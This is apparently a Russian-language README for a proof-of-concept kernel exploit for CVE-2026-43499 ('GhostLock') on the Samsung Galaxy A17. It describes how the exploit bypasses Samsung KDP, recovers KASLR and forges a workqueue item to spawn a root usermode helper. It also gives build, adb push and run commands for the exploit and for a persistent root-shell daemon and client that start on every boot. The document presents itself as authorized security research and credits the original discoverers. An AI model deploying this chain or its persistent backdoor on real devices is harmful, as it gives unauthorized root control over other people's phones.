
Эксплойт ядра для CVE-2026-43499 на Samsung Galaxy A17, обеспечивающий получение root-доступа через обход KDP, восстановление KASLR и выполнение поддельной workqueue с постоянным shell.
Полная цепочка эксплуатации user-to-root для CVE-2026-43499 («GhostLock») на Samsung Galaxy A17 SM-A175F под управлением Android 16 / GKI 6.12.
Цепочка начинается с публичных примитивов GhostLock и завершается usermode helper, выполняющимся как:
uid=0(root) gid=0(root) groups=0(root)
context=u:r:kernel:s0
Он также запускает постоянную root-оболочку на каждой загрузке через g4d / g4sh и завершается без паники ядра.
📖 Полное техническое описание:
https://www.mobilehackinglab.com/blog/cve-2026-43499-ghostlock-a17-root-shell
Заметка об исследовании
Мы не обнаруживали CVE-2026-43499. Заслуга в обнаружении исходной уязвимости и исследовании IonStack принадлежит Nebula Security.
Этот репозиторий документирует наш независимый порт для Samsung Galaxy A17, изменения, потребовавшиеся из-за защит ядра Samsung, и новый финальный этап эксплуатации.
Только для авторизованных исследований безопасности и образовательных целей.
| CVE | CVE-2026-43499 — "ghostlock" |
| Устройство | Samsung Galaxy A17 (SM-A175F, mt6789) |
| GPU | Mali-G57 |
| Ядро | 6.12.23-android16-5-abA175FXXS3BZA5-4k |
| Результат | uid=0(root) / u:r:kernel:s0 |
| Root-оболочка | демон g4d + клиент g4sh |
| Персистентность | При каждой загрузке |
| Выход эксплойта | Чистый, без паники ядра |
| Встреченные механизмы защиты | Samsung KDP, DEFEX, SELinux, PANIC_ON_OOPS, arm64 KASLR |
Оригинальное исследование ghostlock предоставляет входные примитивы:
pselect reclaim
↓
fake rt_mutex_waiter
↓
constrained rb-tree pointer write
Однако на Galaxy A17 стандартный финальный этап с патчингом учётных данных не работает.
KDP защищает связанные с учётными данными данные ядра на EL2.
В этой сборке попытки изменить учётные данные задачи молча отклонялись, даже когда целевые адреса были корректны.
Поэтому вместо записи root-учётных данных этот порт заставляет ядро выполнять код с уже существующими привилегированными учётными данными.
Финальный этап:
constrained kernel write
↓
physical read/write channel
↓
KASLR slide recovery
↓
discover system_wq / cpu_pwq
↓
forge work_struct
↓
call_usermodehelper_exec_work
↓
/system/bin/sh
↓
uid=0(root), u:r:kernel:s0
Поддельный элемент работы помещается в привязанный пул system_wq и активируется штормом аллокаций/освобождений ptmx.
В результате usermode helper выполняется с учётными данными init.
Перезапись учётных данных задачи не требуется.
userspace shell (uid 2000)
│
▼
pselect / PI-futex primitive
│
▼
constrained aligned kernel pointer write
│
▼
forged pipe_buffer channel
│
▼
arbitrary physical read/write
│
├── recover KASLR slide
│
├── locate system_wq / cpu_pwq
│
└── prepare forged work_struct
│
▼
queue usermode-helper work
│
▼
ptmx storm wakes worker
│
▼
/system/bin/sh runs with init creds
│
▼
uid=0(root)
│
▼
g4d → @ghostlockd → g4sh
По сравнению с публичным портом для OnePlus большинство этапов после исходного примитива записи были переработаны.
Финальный этап с патчингом учётных данных был заменён поддельным элементом workqueue, нацеленным на путь выполнения usermode helper.
Это полностью исключает запись в защищённые структуры cred.
Прежний подход с фиксацией через perf-события был ненадёжен на этом устройстве.
Вместо этого эксплойт использует три сдвинутых указателя из записи ctl_table boot_id:
procname
data
proc_handler
Все три перекрёстно проверяются перед принятием сдвига.
cpu_pwq обнаруживается обходом:
system_wq → pwqs
вместо опоры на фиксированное смещение, специфичное для устройства.
Исходный канал оставляет побочные изменения состояния struct page, которые могут вызывать PANIC_ON_OOPS при завершении работы.
Текущая цепочка позволяет избежать краха при завершении и была продемонстрирована с чистым выходом после получения root.
Usermode helper запускает:
g4d
который прослушивает абстрактный Unix-сокет:
@ghostlockd
g4sh подключается к нему и предоставляет либо интерактивную root-оболочку, либо разовое выполнение команд.
/data/local/tmp/a/g4sh
/data/local/tmp/a/g4sh -c "id"
Это устройство сочетает несколько механизмов защиты, которые ломают распространённые техники эксплуатации ядра Android:
Это вынудило использовать иную стратегию эксплуатации по сравнению с обычной:
arbitrary RW → patch cred → disable SELinux
Вместо этого:
arbitrary RW → recover runtime state → forge kernel work → execute usermode helper
Требуется свежий Android NDK.
make
Создаёт:
ghostlock # exploit
g4d # static root-shell daemon
g4sh # root-shell client
Загрузите бинарники:
adb push ghostlock /data/local/tmp/a/g4
adb push g4d /data/local/tmp/a/g4d
adb push g4sh /data/local/tmp/a/g4sh
adb shell 'chmod 755 /data/local/tmp/a/g4 /data/local/tmp/a/g4d /data/local/tmp/a/g4sh'
Запустите цикл эксплойта с учётом перезагрузок:
./scripts/rr_loop4.sh
После ROOTED:
adb shell /data/local/tmp/a/g4sh
Или выполните одну команду:
adb shell '/data/local/tmp/a/g4sh -c "id"'
Ожидаемый результат:
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
Примитив вероятностный и сильно зависит от условий загрузки.
Успешная эксплуатация может потребовать многократных попыток. Прилагаемый скрипт rr_loop4.sh автоматически обрабатывает повторные попытки и циклы перезагрузки.
Это исследовательский эксплойт, а не мгновенный одноразовый инструмент для получения root.
qemu-e2e/ содержит стенд сквозной проверки (end-to-end) с использованием извлечённого ядра Samsung.
Стенд использовался для проверки:
g4d / g4shСам образ ядра Samsung не включён.
Смотрите:
qemu-e2e/
для инструкций по настройке.
Makefile
src/ exploit source and device profiles
src/daemon/ g4d root daemon + g4sh client
docs/OFFSETS.md validated device offsets
docs/PORTING.md porting notes
examples/ proof-of-root artifacts
scripts/rr_loop4.sh reboot-aware exploit loop
qemu-e2e/ end-to-end QEMU validation
NebuSec:
https://nebusec.ai/research/ionstack-part-3/
https://github.com/NebuSec/CyberMeowfia/tree/main/IonStack
https://github.com/JoinChang/ghostlock-oneplus
Более детальный разбор порта для Samsung Galaxy A17, ограничений KDP, восстановления KASLR, финального этапа на основе workqueue и реализации root-оболочки:
https://www.mobilehackinglab.com/blog/cve-2026-43499-ghostlock-a17-root-shell
Артефакты с реального устройства доступны в:
examples/
включая журналы эксплойта и проверку root-контекста.
Пример:
uid=0(root)
gid=0(root)
groups=0(root)
context=u:r:kernel:s0
Этот proof-of-concept предоставлен только для образовательных целей и авторизованных исследований безопасности.
Используйте его только на устройствах и в окружениях, которыми вы владеете или на тестирование которых имеете явное разрешение.